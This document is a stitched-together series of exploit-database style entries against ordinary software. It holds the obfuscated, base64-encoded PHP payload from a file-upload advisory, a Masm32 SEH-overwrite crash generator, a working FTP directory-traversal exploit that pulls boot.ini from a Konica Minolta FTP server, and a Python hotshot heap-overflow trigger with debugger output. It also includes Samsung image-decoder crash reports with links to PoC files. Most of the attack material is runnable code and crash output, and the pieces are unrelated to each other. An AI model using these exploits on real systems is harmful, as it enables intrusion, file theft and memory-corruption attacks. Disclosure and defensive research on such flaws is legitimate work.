"JGU3NTJiNzQxMTZhYzYwMjUzMDFiYWNlOGUwZTA2YmNiPSJc ... ... ...2MVx4MzhcNjJceDMwXDY3XHgzOFw2M1x4MzlcNjBceDM3XDE0Mlx4MzZcNjdceDM5XDE0NFx4MzVcMTQzXHg2Nlw
xNDZceDY1XDYzXHgzN1wxNDEiKT8kYjdkOTFjZDYwMzJlNDRiNDgzY2Y5MGRhOWM4ZmI1MDAoKTokdTZiZmM2YmN
jZjRiMjk4ZDkyZTQzMzFhMzY3MzllMjAoKTs="));
?>
2.png"
Content-Type: image/png
Status: 200[OK]
GET http://localhost:8000/a[ARBITRARY FILE UPLOAD VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/index_files.html]
Reference(s):
http://localhost:8000/index_files.html
http://localhost:8000/AirDriveAction_file_add/
http://localhost:8000/AirDriveAction_file_show/
Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the filename value is estimated as high. (CVSS 8.7)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
# EXPLOIT TITLE: Masm32v11r Buffer Overflow(SEH overwrite) crash POC
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Date of Testing: 22nd September 2015
# Download Link : http://www.masm32.com/masmdl.htm
# Tested On : Windows 10
# Steps to Crash :-
# Step 1: Execute this python script
# Step 2: This script will create a file called MASM_crash.txt
# Step 3: Now open Masm32's QUICK EDITOR
# Step 4: Go to Script > 'Convert Text to Script'
# Step 5: Open the MASM_crash.txt to convert
# Step 6: That should crash the program .
# Write the malformed input file; the 'A'/'B'/'C'/'D' markers make the SEH record
# offsets recognisable in the debugger once the crash is reproduced.
with open('MASM_crash.txt', 'w') as crash_file:
    buffer = "A" * 4676 + "B" * 4 + "C" * 4 + "D" * 500
    crash_file.write(buffer)
/*
---------------------------------------------------------------------
Konica Minolta FTP Utility directory traversal vulnerability
Url: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html
---------------------------------------------------------------------
*/
<?php
// Hostname or IP of the FTP server under test. The original PoC left $ftp_server
// undefined; 'TARGET_HOST' is a placeholder to be replaced.
$ftp_server  = 'TARGET_HOST';
$local_file  = 'boot.ini.txt';
$server_file = '..\..\..\..\..\..\..\..\boot.ini';

$conn_id = ftp_connect($ftp_server);
if ($conn_id === false) {
    die("Could not connect to $ftp_server\n");
}
$login_result = ftp_login($conn_id, "anonymous", "anonymous");

if (ftp_get($conn_id, $local_file, $server_file, FTP_BINARY)) {
    echo "Successfully written to $local_file\n";
} else {
    echo "There was a problem\n";
}
ftp_close($conn_id);
?>
---------------------------------------------------------------------
Title: Python 2.7 hotshot pack_string Heap Buffer Overflow
Credit: John Leitch (john@autosectools.com)
Url1: http://autosectools.com/Page/Python-hotshot-pack_string-Heap-Buffer-Overflow
Url2: http://bugs.python.org/issue24481
Resolution: Fixed
The Python 2.7 hotshot module suffers from a heap buffer overflow due to a memcpy in the pack_string function at line 633:
static int
pack_string(ProfilerObject *self, const char *s, Py_ssize_t len)
{
    if (len + PISIZE + self->index >= BUFFERSIZE) {
        if (flush_data(self) < 0)
            return -1;
    }
    assert(len < INT_MAX);
    if (pack_packed_int(self, (int)len) < 0)
        return -1;
    memcpy(self->buffer + self->index, s, len);
    self->index += len;
    return 0;
}
The problem arises because const char *s is variable length, while ProfilerObject.buffer is fixed-length:
typedef struct {
    PyObject_HEAD
    PyObject *filemap;
    PyObject *logfilename;
    Py_ssize_t index;
    unsigned char buffer[BUFFERSIZE];
    FILE *logfp;
    int lineevents;
    int linetimings;
    int frametimings;
    /* size_t filled; */
    int active;
    int next_fileno;
    hs_time prev_timeofday;
} ProfilerObject;
An overflow can be triggered by passing a large string to the Profile.addinfo method via the value parameter:
from hotshot.stats import *
x = hotshot.Profile("A", "A")
x.addinfo("A", "A" * 0xfceb)
Which produces the following exception:
0:000> r
eax=00000041 ebx=0000fceb ecx=00003532 edx=00000002 esi=075dcb35 edi=075d9000
eip=6c29af1c esp=0027fc78 ebp=0027fc80 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSVCR90!LeadUpVec+0x70:
6c29af1c f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> db edi-0x10
075d8ff0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075d9000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:000> db esi
075dcb35 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb45 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb55 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb65 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb75 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb85 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb95 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcba5 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:000> !heap -p -a edi
address 075d9000 found in
_DPH_HEAP_ROOT @ 6ca1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
722809c: 75d67c8 2838 - 75d6000 4000
6c3194ec verifier!AVrfDebugPageHeapAllocate+0x0000023c
77a257b7 ntdll!RtlDebugAllocateHeap+0x0000003c
779c77ce ntdll!RtlpAllocateHeap+0x0004665a
77981134 ntdll!RtlAllocateHeap+0x0000014d
6c2c3db8 MSVCR90!malloc+0x00000079 [f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.c @ 163]
1e0ae6d1 python27!PyObject_Malloc+0x00000161 [c:\build27\cpython\objects\obmalloc.c @ 968]
0:000> !heap -p -a esi
address 075dcb35 found in
_DPH_HEAP_ROOT @ 6ca1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
7228068: 75da300 fd00 - 75da000 11000
6c3194ec verifier!AVrfDebugPageHeapAllocate+0x0000023c
77a257b7 ntdll!RtlDebugAllocateHeap+0x0000003c
779c77ce ntdll!RtlpAllocateHeap+0x0004665a
77981134 ntdll!RtlAllocateHeap+0x0000014d
6c2c3db8 MSVCR90!malloc+0x00000079 [f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.c @ 163]
1e0ae6d1 python27!PyObject_Malloc+0x00000161 [c:\build27\cpython\objects\obmalloc.c @ 968]
0:000> k4
ChildEBP RetAddr
0027fc80 1e008380 MSVCR90!LeadUpVec+0x70 [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 289]
0027fc90 1e008407 python27!pack_string+0x40 [c:\build27\cpython\modules\_hotshot.c @ 634]
0027fca8 1e0089bb python27!pack_add_info+0x77 [c:\build27\cpython\modules\_hotshot.c @ 652]
0027fcc0 1e0aafd7 python27!profiler_addinfo+0x5b [c:\build27\cpython\modules\_hotshot.c @ 1020]
0:000> .frame 1
01 0027fc90 1e008407 python27!pack_string+0x40 [c:\build27\cpython\modules\_hotshot.c @ 634]
0:000> dV
self = 0x075dcb35
s = 0x075da314 "AAAAAAAAAAAAAAAAAAA[...]AA..."
len = 0n123572224
0:000> dt self
Local var @ esi Type ProfilerObject*
+0x000 ob_refcnt : 0n1094795585
+0x004 ob_type : 0x41414141 _typeobject
+0x008 filemap : 0x41414141 _object
+0x00c logfilename : 0x41414141 _object
+0x010 index : 0n1094795585
+0x014 buffer : [10240] "AAAAAAAAAAAAAAAAAAA[...]AA..."
+0x2814 logfp : 0x41414141 _iobuf
+0x2818 lineevents : 0n1094795585
+0x281c linetimings : 0n1094795585
+0x2820 frametimings : 0n1094795585
+0x2824 active : 0n1094795585
+0x2828 next_fileno : 0n1094795585
+0x2830 prev_timeofday : 0n4702111234474983745
0:000> !analyze -v -nodb
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
FAULTING_IP:
MSVCR90!LeadUpVec+70 [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 289]
6c29af1c f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 6c29af1c (MSVCR90!LeadUpVec+0x00000070)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 075d9000
Attempt to write to address 075d9000
CONTEXT: 00000000 -- (.cxr 0x0;r)
eax=00000041 ebx=0000fceb ecx=00003532 edx=00000002 esi=075dcb35 edi=075d9000
eip=6c29af1c esp=0027fc78 ebp=0027fc80 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSVCR90!LeadUpVec+0x70:
6c29af1c f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
FAULTING_THREAD: 000013b0
PROCESS_NAME: pythonw.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 075d9000
WRITE_ADDRESS: 075d9000
FOLLOWUP_IP:
MSVCR90!LeadUpVec+70 [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 289]
6c29af1c f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
NTGLOBALFLAG: 2000000
APPLICATION_VERIFIER_FLAGS: 0
APP: pythonw.exe
ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) x86fre
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_NXCODE
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_NXCODE
DEFAULT_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_NXCODE
LAST_CONTROL_TRANSFER: from 1e008380 to 6c29af1c
STACK_TEXT:
0027fc80 1e008380 075d67df 075da314 0000fceb MSVCR90!LeadUpVec+0x70
0027fc90 1e008407 075da314 1e008960 00000000 python27!pack_string+0x40
0027fca8 1e0089bb 072e67b4 075da314 0769e788 python27!pack_add_info+0x77
0027fcc0 1e0aafd7 075d67c8 071aabc0 0769e788 python27!profiler_addinfo+0x5b
0027fcd8 1e0edd10 0769e788 071aabc0 00000000 python27!PyCFunction_Call+0x47
0027fd04 1e0f017a 0027fd5c 06d57b18 06d57b18 python27!call_function+0x2b0
0027fd74 1e0f1150 071a9870 00000000 06d57b18 python27!PyEval_EvalFrameEx+0x239a
0027fda8 1e0f11b2 06d57b18 071a9870 06d5ba50 python27!PyEval_EvalCodeEx+0x690
0027fdd4 1e11707a 06d57b18 06d5ba50 06d5ba50 python27!PyEval_EvalCode+0x22
0027fdec 1e1181c5 0722e260 06d5ba50 06d5ba50 python27!run_mod+0x2a
0027fe0c 1e118760 6c2f7408 06d17fac 00000101 python27!PyRun_FileExFlags+0x75
0027fe4c 1e1190d9 6c2f7408 06d17fac 00000001 python27!PyRun_SimpleFileExFlags+0x190
0027fe68 1e038d35 6c2f7408 06d17fac 00000001 python27!PyRun_AnyFileExFlags+0x59
0027fee4 1d001017 00000002 06d17f88 1d0011b6 python27!Py_Main+0x965
0027fef0 1d0011b6 1d000000 00000000 04d3ffa8 pythonw!WinMain+0x17
0027ff80 76477c04 7ffde000 76477be0 63080f16 pythonw!__tmainCRTStartup+0x140
0027ff94 7799ad1f 7ffde000 62fa2f53 00000000 KERNEL32!BaseThreadInitThunk+0x24
0027ffdc 7799acea ffffffff 77980228 00000000 ntdll!__RtlUserThreadStart+0x2f
0027ffec 00000000 1d001395 7ffde000 00000000 ntdll!_RtlUserThreadStart+0x1b
STACK_COMMAND: .cxr 0x0 ; kb
FAULTING_SOURCE_LINE: f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm
FAULTING_SOURCE_FILE: f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm
FAULTING_SOURCE_LINE_NUMBER: 289
FAULTING_SOURCE_CODE:
No source found for 'f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm'
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: msvcr90!LeadUpVec+70
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: MSVCR90
IMAGE_NAME: MSVCR90.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 51ea24a5
FAILURE_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_NXCODE_c0000005_MSVCR90.dll!LeadUpVec
BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_NXCODE_msvcr90!LeadUpVec+70
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:string_dereference_exploitable_fill_pattern_nxcode_c0000005_msvcr90.dll!leadupvec
FAILURE_ID_HASH: {006f2a1a-db5d-7798-544b-da0c2e0bcf19}
Followup: MachineOwner
---------
To fix the issue, pack_string should confirm that the fixed-length buffer is of sufficient size prior to performing the memcpy.
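The check described above, as an added example in C (not CPython's pack_string; the packer_t struct, BUFFERSIZE and the 4-byte length prefix are assumptions made for this illustration):

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not CPython's code: a fixed-length output buffer of the kind
 * pack_string writes into, with the size check the fix calls for performed
 * before the memcpy. BUFFERSIZE, packer_t and the 4-byte length prefix are
 * assumptions made for this illustration. */
#define BUFFERSIZE 64

typedef struct {
    unsigned char buffer[BUFFERSIZE]; /* fixed-length buffer */
    size_t index;                     /* next free byte in buffer */
} packer_t;

/* Returns 0 on success, -1 if the length prefix plus the string would not fit
 * in the remaining space. Nothing is written on failure, so the caller can
 * flush the buffer and retry instead of overrunning it. */
int pack_string_checked(packer_t *p, const char *s, size_t len)
{
    size_t need;
    if (p->index > BUFFERSIZE)          /* guard against corrupted state */
        return -1;
    if (len > SIZE_MAX - 4)             /* 4 + len must not wrap */
        return -1;
    need = 4 + len;
    if (need > BUFFERSIZE - p->index)   /* the bounds check the fix requires */
        return -1;
    /* 4-byte little-endian length prefix, then the bytes themselves */
    p->buffer[p->index++] = (unsigned char)(len & 0xff);
    p->buffer[p->index++] = (unsigned char)((len >> 8) & 0xff);
    p->buffer[p->index++] = (unsigned char)((len >> 16) & 0xff);
    p->buffer[p->index++] = (unsigned char)((len >> 24) & 0xff);
    memcpy(p->buffer + p->index, s, len);
    p->index += len;
    return 0;
}

int main(void)
{
    packer_t p;
    char big[80];
    memset(&p, 0, sizeof p);
    memset(big, 'A', sizeof big);
    printf("short string: %d\n", pack_string_checked(&p, "hello", 5));     /* 0 */
    printf("oversized:    %d\n", pack_string_checked(&p, big, sizeof big)); /* -1 */
    printf("bytes used:   %zu of %d\n", p.index, BUFFERSIZE);
    return 0;
}
```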
Source: https://code.google.com/p/google-security-research/issues/detail?id=497
Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds.
I/DEBUG ( 2961): pid: 12383, tid: 12549, name: thread-pool-1 >>> com.sec.android.gallery3d <<<
I/DEBUG ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000
I/DEBUG ( 2961): x0 0000000089e8117c x1 00000000000000ff x2 00000000177fe13c x3 0000000089e8117c
I/DEBUG ( 2961): x4 0000000000000004 x5 0000007f65f42300 x6 0000000000000002 x7 ffffffffffffffff
I/DEBUG ( 2961): x8 0000000089e83ff0 x9 0000007f65f020b0 x10 000000000000003c x11 000000000000003b
I/DEBUG ( 2961): x12 0000007f65f02080 x13 00000000ffffffff x14 0000007f65f02080 x15 00000000000061e0
I/DEBUG ( 2961): x16 0000007f6baccc10 x17 0000007f958f8d80 x18 0000007f9596da40 x19 0000007f65f0e180
I/DEBUG ( 2961): x20 0000007f65f54020 x21 00000000002f0020 x22 0000000000000020 x23 0000000005e00400
I/DEBUG ( 2961): x24 0000000000000004 x25 0000007f65f42300 x26 0000000000000020 x27 0000007f65f52080
I/DEBUG ( 2961): x28 00000000000001da x29 0000000013071460 x30 0000007f6ba7e40c
I/DEBUG ( 2961): sp 0000007f66796130 pc 0000007f958f8e28 pstate 0000000020000000
I/DEBUG ( 2961):
I/DEBUG ( 2961): backtrace:
I/InjectionManager(12532): Inside getClassLibPath caller
I/DEBUG ( 2961): #00 pc 0000000000019e28 /system/lib64/libc.so (memset+168)
I/DEBUG ( 2961): #01 pc 0000000000030408 /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64)
I/DEBUG ( 2961): #02 pc 0000000000033440 /system/lib64/libSecMMCodec.so (DecodeFile+120)
I/DEBUG ( 2961): #03 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
I/DEBUG ( 2961): #04 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
To reproduce, download the file and open it in Gallery.
This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38613.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=498
The attached JPEG, upsample.jpg, can cause memory corruption when media scanning occurs.
F/libc ( 8600): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x206e6f69747562 in tid 8685 (HEAVY#0)
I/DEBUG ( 2956): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 2956): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG ( 2956): Revision: '10'
I/DEBUG ( 2956): ABI: 'arm64'
I/DEBUG ( 2956): pid: 8600, tid: 8685, name: HEAVY#0 >>> com.samsung.dcm:DCMService <<<
I/DEBUG ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x206e6f69747562
I/DEBUG ( 2956): x0 0000007f8cef2ab0 x1 0000000000000002 x2 0000007f8cef2ab0 x3 0000007f8ce5a390
I/DEBUG ( 2956): x4 0000007f8cef28d0 x5 3d206e6f69747562 x6 0000007f8cef29f0 x7 42e34ca342e32177
I/DEBUG ( 2956): x8 42e390a242e37199 x9 42dfe02f42debc0f x10 42e06c3442e03665 x11 42e0afd542e08c24
I/DEBUG ( 2956): x12 42e1070042e0e62d x13 42e1830842e146da x14 42e1f53342e1add4 x15 00000000000014a4
I/DEBUG ( 2956): x16 0000007f9f0d6ae0 x17 0000007fa3e7e880 x18 0000007f8ce75c60 x19 0000007f8cebe000
I/DEBUG ( 2956): x20 0000000000000001 x21 0000007f8cebe000 x22 0000000000000001 x23 0000000000000000
I/DEBUG ( 2956): x24 0000000000000000 x25 0000000000000000 x26 0000000010000000 x27 0000007f8c5ff050
I/DEBUG ( 2956): x28 0000007f8ce77800 x29 000000000000001c x30 0000007f9f09fff8
I/DEBUG ( 2956): sp 0000007f8d0fea20 pc 0000007f9f09e83c pstate 0000000080000000
I/DEBUG ( 2956):
I/DEBUG ( 2956): backtrace:
I/DEBUG ( 2956): #00 pc 000000000009b83c /system/lib64/libQjpeg.so (WINKJ_DoIntegralUpsample+164)
I/DEBUG ( 2956): #01 pc 000000000009cff4 /system/lib64/libQjpeg.so (WINKJ_SetupUpsample+228)
I/DEBUG ( 2956): #02 pc 0000000000035700 /system/lib64/libQjpeg.so (WINKJ_ProgProcessData+236)
I/DEBUG ( 2956): #03 pc 0000000000041f08 /system/lib64/libQjpeg.so (WINKJ_DecodeImage+688)
I/DEBUG ( 2956): #04 pc 00000000000428d4 /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG ( 2956): #05 pc 0000000000042a08 /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG ( 2956): #06 pc 000000000004420c /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG ( 2956): #07 pc 00000000000a4234 /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG ( 2956): #08 pc 0000000000001b98 /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG ( 2956): #09 pc 0000000000001418 /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG ( 2956): #10 pc 00000000000018ec /system/framework/arm64/saiv.odex
To reproduce, download the image file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38612.zip